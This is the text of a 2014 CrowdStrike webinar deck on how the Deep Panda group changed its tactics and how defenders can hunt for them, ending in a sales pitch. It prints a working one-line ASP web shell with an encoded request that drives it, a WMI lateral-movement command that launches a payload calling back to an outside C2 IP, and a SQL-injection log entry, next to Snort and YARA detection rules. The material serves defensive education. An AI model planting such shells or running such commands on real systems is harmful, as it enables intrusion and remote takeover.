crowdcasts monthly: going beyond the indicator
DESCRIPTION
Learn more about CrowdStrike Services. Request a free consultation on Proactive Response and Incident Response offerings: response.crowdstrike.com/services/TRANSCRIPT
Going Beyond the Indicator
Agenda
• Introductions
• Typical Attacker TTPs
• Case Studies
• New Tactics Explained
• Hunting and Detecting
• Best Practice Preparations
• Resources / Q & A
© 2014 CrowdStrike, Inc. All rights reserved. 2
@CROWDSTRIKE | #CROWDCASTS
Today’s Speakers
Stroz Friedberg, AT&T, The Aerospace Corporation, CERT/CC
Incident Response, Forensic Analysis, and Risk Assessments
DANNY LUNGSTROM
© 2014 CrowdStrike, Inc. All rights reserved. 3
PRIOR TO CROWDSTRIKE
8+ YEARS
@CROWDSTRIKE | #CROWDCASTS
LinkedIn: Danny Lungstrom
CONNECT
Today’s Speakers
KPMG LLP. (Information Protection and Business Resiliency)
Performing Security Assessments, Auditing and Remediating Environments, and Developing Security Programs/Strategies
JUSTIN J. WEISSERT
© 2014 CrowdStrike, Inc. All rights reserved. 4
PRIOR TO CROWDSTRIKE
CONNECT
7+ YEARS
@CROWDSTRIKE | #CROWDCASTS
LinkedIn: Justin Weissert
Twitter: @JJWeissert
Today’s Speakers
RSA NetWitness, Mandiant, Beckman Coulter
LinkedIn: Ryan Jafarkhani
Twitter: @rj_jafar
Auditing, Conducting Incident Response Investigations, Network Forensics, Computer Forensics and Malware Analysis
© 2014 CrowdStrike, Inc. All rights reserved. 5
PRIOR TO CROWDSTRIKE
CONNECT
5+ YEARS
@CROWDSTRIKE | #CROWDCASTS
RYAN JAFARKHANI
6
WHO IS
?
CrowdStrike is a global provider of security technologies and services focused on identifying advanced threats and targeted attacks. Using big-data technologies, CrowdStrike’s next-generation threat protection platform enables enterprises to identify unknown malware, detect zero-day threats, pinpoint advanced adversaries, and provide attribution.
© 2014 CrowdStrike, Inc. All rights reserved.
7
WHAT DO WE DO?
TECHNOLOGY
ENDPOINT THREAT DETECTION & RESPONSE
CONTINUOUS ENDPOINT ACTIVITY MONITORING & REAL-TIME FORENSICS
SERVICES PROACTIVE & INCIDENT RESPONSE SERVICES
INTELLIGENCE CYBER THREAT INTELLIGENCE & ATTRIBUTION
© 2014 CrowdStrike, Inc. All rights reserved.
About CrowdStrike Services
Incident Response Investigations
Proactive Threat Assessments
IR Program Development
Average of Ten Years IR Industry Experience
Backgrounds in IR Consulting, Government, and Defense
Specialists in Broad Range of Technologies
Finance, Technology, Manufacturing, Retail, Healthcare, Telecommunications, Oil & Gas, Entertainment
© 2014 CrowdStrike, Inc. All rights reserved. 8
COMPREHENSIVE OFFERINGS
INDUSTRY VETERANS
VARIETY OF CUSTOMER VERTICALS
@CROWDSTRIKE | #CROWDCASTS
WHO ADVERSARY
WHY INTENT
WHAT MALWARE
INDUSTRY
And there are a lot of adversaries
© 2014 CrowdStrike, Inc. All rights reserved. 9
Adversary groups our Intelligence team tracks…
Commercial, Government, Non-profit
Financial, Technology, Communications
Defense & Aerospace, Industrial Engineering, NGOs
Financial Sector
Dissident groups
Electronics & Communications
G20, NGOs, Dissident Groups
CHINA IRAN
Energy Companies
INDIA
Government, Legal, Financial, Media, Telecom
RUSSIA
Oil and Gas Companies
Financial Sector
Crime Syndicates
@CROWDSTRIKE | #CROWDCASTS
10
TYPICAL ATTACKER TTPS
2014 Crowdstrike, Inc. All rights reserved.
Typical - Attacker TTPs
• Initial Attack Vector
• Malware
– Persistence Mechanism
– Command & Control
– Functionality
• Lateral Movement
• Data Extraction/Theft
2014 CrowdStrike, Inc. All rights reserved. 11
Shift in Attacker TTPs
2014 CrowdStrike, Inc. All rights reserved. 12
Attacker TTP Historical Trends Current Trends
Initial Attack Vector
Spearphish and Vulnerable External Facing Applications (Most Common) No Significant Change
Malware – Persistence Mechanism
Installed as Service, Run Key, Etc. No Persistence
Malware – Command & Control
Beacon to Malicious IP or Domain No Standard Beacon Activity
Malware – Functionality
Simple – Provides Shell or Basic Upload/Download Functionality
Robust – Includes All Required Functionality and Commands
Malware – Location Written to Disk Memory-Resident
Shift in Attacker TTPs (Cont.)
2014 CrowdStrike, Inc. All rights reserved. 13
Attacker TTP Historical Trends Current Trends
Lateral Movement Net Use, RDP or Utilities (e.g. PSExec) WMI, Service Accounts
Obfuscation Timestomp Standard Times (Windows API)
Timestomp Both Standard and File Times (Windows API and MFT)
Data Extraction Compress Data and Send to Compromised Host Provider No Significant Change
Last Hop Communication
Source Country IPs (Most Often Chinese, Russian, Iranian)
North American IPs, Anonymous VPN Solutions, Cloud
Catalyst for Change
2014 CrowdStrike, Inc. All rights reserved. 14
• Shifts in Tactics
– Increased Intel Sharing
• Whitepapers
• Blog Posts
• Conference Demos
• VirusTotal
• US Government JIB (Joint Indicator Bulletin)
Pros Cons
• Increased awareness / detection for public companies
• Decreased Intel gap for smaller organizations
• Increased costs for attackers to change TTPs
• Indicators become less effective as attackers shift TTPs (e.g. new malware, C2 infrastructure)
• Attacks become more advanced to avoid current methods of detection
• Reduces visibility into what attacker is doing and/or targeting
15
CASE STUDIES
2014 Crowdstrike, Inc. All rights reserved.
Case Studies - Background
• Company #1
– Company compromised in 2012 using historical TTPs
– Partial Remediation February 2013
– Re-Compromise March 2013 with new TTPs
• Company #2
– Compromised March 2013
– New TTPs from Company 1 re-compromise were observed
© 2014 CrowdStrike, Inc. All rights reserved. 16
Timeline
© 2014 CrowdStrike, Inc. All rights reserved. 17
@CROWDSTRIKE | #CROWDCASTS
February 2013 March 2013 April 2013
Company #1 Investigation Commences
Traditional
Tactics
Intel Community Shares
TTPs Shared
Widely
Company #1 Partial
Remediation
Logging & Monitoring Old
Tactics
Company #2 Investigation Commences
New Tactics
Company #1 Re-compromised
New Tactics
18
NEW TACTICS EXPLAINED
2014 Crowdstrike, Inc. All rights reserved.
Deep Panda – Simple Web Shell
• 28 byte web shell
• Active Server Page file
– Expected input is VBScript code (encoded as ASCII hex)
• The execute() function executes any VBScript passed to it
– Upload / download files
– Execute arbitrary commands (including WMI)
– Full access to file system
• Controlled by an attacker “thick client”
2014 Crowdstrike, Inc. All rights reserved. 19
<%execute request(chr(42))%>
Deep Panda – Simple Web Shell
2014 Crowdstrike, Inc. All rights reserved. 20
As a simple example of an encoded command, the following GET request would cause the backdoor to execute the code Response.Write(“<h1>Hello World</h1>”) and would render “Hello World” to be printed in the web browser:
http://<webserver>/showimage.asp?*=%52%65%73%70%6F%6E%73%65%2E%57%72%69%74%65%28%22%3C%68%31%3E%48%65%6C%6C%6F%20%57%6F%72%6C%64%3C%2F%68%31%3E%22%29
Deep Panda – Complex Web Shell
© 2014 CrowdStrike, Inc. All rights reserved. 21
• Ability to impersonate a user (with valid credentials)
• Eight different commands
– File system, SQL server, and Active Directory requests
– Upload / download files
– Compile and execute any C# code
Web Shell Authentication
• Rudimentary (but effective) authentication for incoming connections
– Requires the presence of a cookie named ‘zWiz’
– or HTTP header Keep-Alive = 320
– or language header containing es-DN (invalid language)
• Prevents identification via search engine indexing or vulnerability scanning
2014 Crowdstrike, Inc. All rights reserved. 22
Web Shells – But Why?
• Primary foothold back into victim organization
• Less reliant on malware installed on systems, beaconing to a C2
© 2014 CrowdStrike, Inc. All rights reserved. 23
• Why?
– Low to virtually no detection by antivirus products
– The absence of command and control beacon traffic
– Impossible to block known malicious IP addresses to a web server since adversary can easily change their source IP address
– Cookie and HTTP header authentication aware web shells avoid being enumerated by search engines and restrict access, further reducing their network footprint
Second Stage Malware
© 2014 CrowdStrike, Inc. All rights reserved. 24
C2 Infrastructure
- Execution using Web Shell - Lateral Movement - Data theft
Upload Malware Access
Web Shell
Adversary
Web Server Anonymous VPN or Proxy
Why? No Command and Control Beacon activity Change IP/Domain on the fly Runs in memory
Limits forensic artifacts
Lateral Movement
© 2014 CrowdStrike, Inc. All rights reserved. 25
Web Server
System32\cmd.exe - c:\bad.exe /f wmi /s Host2 /u Host2\Administrator /p ”P@ssW0rd" /m call /q "Win32_Process" /c Create – CommandLine:C:\bad.exe /f sh /s 59.111.22.222 /p 443"
Host 2
C2 Infrastructure 59.111.22.222
Anonymous VPN or Proxy
Adversary
Access Web Shell
Leverage WMI Custom VB script “PsExec” Utility
4kb script to remotely launch process as a specified user Cscript.exe – Username Password Remote Host Process path
Why WMI? Evades most typical logging
Shows up as WMI Service Powerful functionality, built into Windows
26
HUNTING AND DETECTING
2014 Crowdstrike, Inc. All rights reserved.
Go Beyond the Indicator
• New evil requires new approaches for detection
• Look through multiple haystacks for a single needle
– The evil stands out with the right methodology
• Blog series
– Mo’ Shells Mo’ Problems
© 2014 CrowdStrike, Inc. All rights reserved. 27
http://www.crowdstrike.com/blog/
Hunting – WMI Activity
© 2014 CrowdStrike, Inc. All rights reserved. 28
• Windows XP and Server 2003 Had Limited Logging
– %systemroot%\system32\wbem\logs
• Windows 7 and Server 2008 Do NOT Log
– Help investigators help you – enable ahead of time!
• Wevtutil.exe sl Microsoft-‐Windows-‐WMI-‐Activity/Trace /e:true – Review WMITracing.log via Event Viewer
• Be Familiar with Your Environment’s Use of WMI
Hunting Web Shells – Identifying Intrusion Points
• Web shells are often one of the earliest stages of malware
• Search for activity on the system near the first known compromise time
– Successful web scans in logs
– SQL injection
– Dropper malware
– Lateral movement from other compromised systems
– Pages created or modified within the webserver document root
2014 Crowdstrike, Inc. All rights reserved. 29
2013-08-25 13:03:53 GET item-details.aspx id=1%27%20or%201=@@version-- - 80 - <redacted IP>
Hunting Web Shells – File Stacking
• File stacking is based on the concept of least frequency of occurrence
• Collect files from all of your webservers and investigate outliers
– What files do not exist on other web servers?
– PHP|JSP|ASP|ASPX|CFM
© 2014 CrowdStrike, Inc. All rights reserved. 30
Hunting Web Shells – Web Log Review
• Perform statistical analysis of page requests and search for outliers
– See exactly when the web shells were in use via the web logs
2014 Crowdstrike, Inc. All rights reserved. 31
Hunting Web Shells – Network Monitoring
• Stack Web Requests from Network Data
• Leverage Cyber Intelligence Feeds to Detect Known Web Shells
– Unique header attributes
– HTML used to produce the shell
© 2014 CrowdStrike, Inc. All rights reserved. 32
alert tcp $EXTERNAL_NET any -‐> $WEB_SERVERS $HTTP_PORTS (msg: "CrowdStrike Deep Panda CSharp Webshell Headers"; content: "Keep-‐Alive: 320"; http_raw_header; content: "es-‐DN"; http_raw_header; flow: established, to_server; classtype: trojan-‐activity; metadata: service http; sid: xxx; rev: xxx; )
Hunting – Memory Resident Malware
© 2014 CrowdStrike, Inc. All rights reserved. 33
• “Fileless” Forensics Fun
• Persistence, We Don’t Need No Stinkin’ Persistence
• New Approach to Malware Means New Approach to Forensics
• Hidden, Not Invisible
• What’s Normal and What’s New?
– Get to know your systems
– Image memory, review, rinse and repeat
Hunting with YARA
• YARA signatures can be used to search your enterprise for specific patterns on disk and in memory
2014 Crowdstrike, Inc. All rights reserved. 34
rule CrowdStrike_13091_01 : deep_panda alice RAT { meta: description = "Detection of Mad Hatter .NET RAT" last_modified = "2013-10-08" version = "1.1" in_the_wild = true copyright = "CrowdStrike, Inc" report = "CSIT-13091" strings: $marker1 = "alice'srabbithole" wide $marker2 = "{{\"Version\":{0},\"HostName\":\"{1}\",\"osVersion\":\"{2}\",\"tm\":\ "{3}\",\"tz\":{4}}}" wide $marker3 = "InstManager.pdb" $marker4 = "<osVersion>" $marker5 = "<tm>" $marker6 = "<tz>" condition: uint16(0) == 0x5A4D and uint32(uint32(0x3C)) == 0x00004550 and 2 of ($marker*) }
CrowdResponse
• Free CrowdStrike Community Tool
• Collect and Analyze Artifacts Across Your Enterprise
• Available Modules
– DirList
– YARA
– PSList
• Many Modules Coming Soon
© 2014 CrowdStrike, Inc. All rights reserved. 35
http://www.crowdstrike.com/community-tools/
36
BEST PRACTICE PREPARATIONS
2014 Crowdstrike, Inc. All rights reserved.
Best Practices
• Proactive Defense of Your Network
– Isolate Critical Assets with Network Segmentation
– Consolidate and Monitor Internet Egress Points
– Implement Centralized Logging
– Patch, Patch, and Patch Again
– Secure Web Applications and Internal Software Projects
– Minimize or Remove Local Admin Privileges
– Implement a Tiered Active Directory Admin Model
– Incorporate Cyber Intelligence Feeds
2014 Crowdstrike, Inc. All rights reserved. 37
CrowdStrike Can Help!
• Services to Consider
– Tabletop Assessments (Yearly at Least)
• Keep your team primed and educated on latest attack vectors
– Next-Gen Penetration Testing
• More than just a cursory glance, take a real-world scenario approach
– Incident Response, Disaster Recovery and Business Continuity Plans • CrowdStrike knowledge and experience can help you improve/build plans
– Incident Response Services Retainer
• Avoid paperwork related time delays
• CrowdStrike Intelligence Subscription
– Stay Up To Date with Latest Attacker TTPs
2014 CrowdStrike, Inc. All rights reserved. 38
39
CROWDSTRIKE RESOURCES
2014 Crowdstrike, Inc. All rights reserved.
CrowdStrike Global Threat Report
• Adversary activity analysis and predictions
• Look back at 2013
• Predictive trends for 2014
• Threat actor profiles and TTPs
• Get it on crowdstrike.com
© 2014 CrowdStrike, Inc. All rights reserved. 40
INCIDENT RESPONSE SERVICES
PROACTIVE RESPONSE SERVICES
CROWDSTRIKE SERVICES
PROACTIVE RESPONSE SERVICES
INCIDENT RESPONSE SERVICES
CrowdStrike Services
INTELLIGENCE TECHNOLOGY
2014 Crowdstrike, Inc. All rights reserved. 41
2014 Crowdstrike, Inc. All rights reserved. 42
PROACTIVE RESPONSE SERVICES
PROACTIVE RESPONSE SERVICES
Counter Threat Assessment IR Program Development Next-Gen Pen Testing Tabletop Assessment InfoSec Capability Maturing Model Adversary Assessments
INCIDENT RESPONSE SERVICES
Computer Forensic Analysis Litigation Support Expert Witness Testimony Remediation Malware Analysis
Government-quality intelligence developed using an ‘all-source model’ Detailed technical and strategic analysis of 50+ adversaries’ capabilities, indicators and tradecraft, attribution and intentions Customizable feeds and API for indicators of compromise Indicators can be integrated into current firewall, IDS/IPS, or SIEM solutions to provide real-time attribution Tailored Intelligence feature provides visibility into breaking events that matter an organization’s brand, infrastructure, and customers
Falcon Intelligence: Threat Intelligence Subscription
2
3
4
1
5
2014 Crowdstrike, Inc. All rights reserved. 43
Falcon Host: Endpoint Threat Detection & Response
Identifies unknown malware & detects zero-day threats Captures and correlates system events to identify adversary activity in real-time Maximum visibility across the full kill chain allows for insight into past & current attacks Context-based detection does not rely on signatures or easily changed IOCs Intelligence integration provides full attribution to identify context, motivation, and actor behind an attack
2
3
4
1
5
2014 Crowdstrike, Inc. All rights reserved. 44
Falcon Host: Continuous Endpoint Activity Monitoring
Explore rich execution data collected by the Falcon Host sensors Dashboards provide an at-a-glance view of recent activity for investigative purposes Expert-designed menu of queries provide the ability to proactively hunt for malicious activity
2
3
1
2014 Crowdstrike, Inc. All rights reserved. 45
© 2014 CrowdStrike, Inc. All rights reserved. 46
Q & A
NEXT
© 2014 CrowdStrike, Inc. All rights reserved. 47
@CROWDSTRIKE | #CROWDCASTS
Topic: Operationalizing Intelligence
Adam Meyers – Director, Intelligence
Elia Zaitsev – Senior Sales Engineer
April 29th | 2PM ET/11AM PT
Q&A